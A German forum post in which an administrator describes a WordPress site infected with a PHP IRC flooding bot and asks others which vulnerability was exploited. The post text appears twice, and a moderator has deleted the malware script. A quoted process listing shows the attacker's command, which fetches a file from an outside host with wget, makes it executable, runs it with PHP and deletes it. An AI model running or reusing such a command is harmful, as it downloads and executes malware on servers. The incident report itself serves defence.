Moin moin,
gestern hat es mal wieder geknallt. Auf eine Webseite (WordPress, laut Kunde aktuellste Version) konnte ein PHP-Bot eingespielt werden (ist im Cache-Verzeichnis eines Themes gelandet), welcher sich mit einem IRC-Server verbunden hat, um dort die Befehle für Flooding-Attacken entgegenzunehmen.
Interessant finde ich vor allem, dass der Angreifer in der Lage war, über PHP per wget das Script auf den Server zu laden:
Hier das Script:
MOD: Malware-Script gelöscht!
Habe die Website erstmal vom Netz genommen und den Provider, der den IRC-Server hosted informiert, im Laufe des Tages werde ich mir das mal genauer ansehen.
Hat hier jemand vielleicht ähnliche Erfahrungen gemacht und kennt die hier ausgenutze Schwachstelle? Würde dem Kunden gerne eine Handlungsempfehlung geben.
gestern hat es mal wieder geknallt. Auf eine Webseite (WordPress, laut Kunde aktuellste Version) konnte ein PHP-Bot eingespielt werden (ist im Cache-Verzeichnis eines Themes gelandet), welcher sich mit einem IRC-Server verbunden hat, um dort die Befehle für Flooding-Attacken entgegenzunehmen.
Interessant finde ich vor allem, dass der Angreifer in der Lage war, über PHP per wget das Script auf den Server zu laden:
Code:
\_ /usr/bin/php5-cgi -c /verzeichnis/des/kunden/etc/php.ini
10003 1457 0.0 0.0 9556 1436 ? S 20:07 0:00 | | \_ sh -c wget http://androidk.0hna.com/images/dp.jpw; lwp-download http://androidk.0hna.com/images/dp.jpw; chmod 777 dp.jpw; php dp.jpw; rm -rf dp.jpw*; d
Hier das Script:
MOD: Malware-Script gelöscht!
Habe die Website erstmal vom Netz genommen und den Provider, der den IRC-Server hosted informiert, im Laufe des Tages werde ich mir das mal genauer ansehen.
Hat hier jemand vielleicht ähnliche Erfahrungen gemacht und kennt die hier ausgenutze Schwachstelle? Würde dem Kunden gerne eine Handlungsempfehlung geben.
Last edited by a moderator: